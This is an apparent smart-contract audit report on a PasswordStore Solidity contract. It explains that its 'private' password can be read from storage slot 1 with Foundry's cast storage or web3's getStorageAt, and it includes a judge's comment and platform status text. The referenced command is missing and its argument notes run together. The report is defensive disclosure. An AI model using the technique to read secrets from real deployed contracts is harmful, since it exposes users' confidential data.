Password is Visible to All
Summary
Contrary to popular belief, private storage variables in Solidity are not hidden from the public. All contract storage data is transparent on the blockchain. Anyone can inspect storage slot 1 of the PasswordStore contract to retrieve the password.
Vulnerability Details
As highlighted above, storage slot 1 is visible to anyone on the blockchain. Foundry provides the cast storage function to read data from a specific storage slot. In a JavaScript environment, one can also utilize web3.eth.getStorageAt from the web3.js library.
Below is the cast command that enabled me to retrieve the password:
0x5fbdb2315678afecb367f032d93f642f64180aa3is the address of the deployed contract.1represents the index of the storage slot where the password is stored.parse-bytes32-stringis a utility function that converts a hex value into a string.
Impact
The protocol explicitly states that users other than the owner should not have access to the password. Our findings demonstrate that ANY user can indeed retrieve the password.
Tools Used
Foundry with cast
Recommendations
One possible solution is to store an encrypted version of the password rather than its plain-text format. Implementing this would likely necessitate a significant refactor of any front-end associated with this contract.
Lead Judging Commences
finding-anyone-can-read-storage
Private functions and state variables are only visible for the contract they are defined in and not in derived contracts. In this case private doesn't mean secret/confidential
Rewards breakdown
Live
The contest is live. Earn rewards by submitting a finding.
Appeals
This is your time to appeal against judgements on your submissions.
Appeals Review
Appeals are being carefully reviewed by our judges.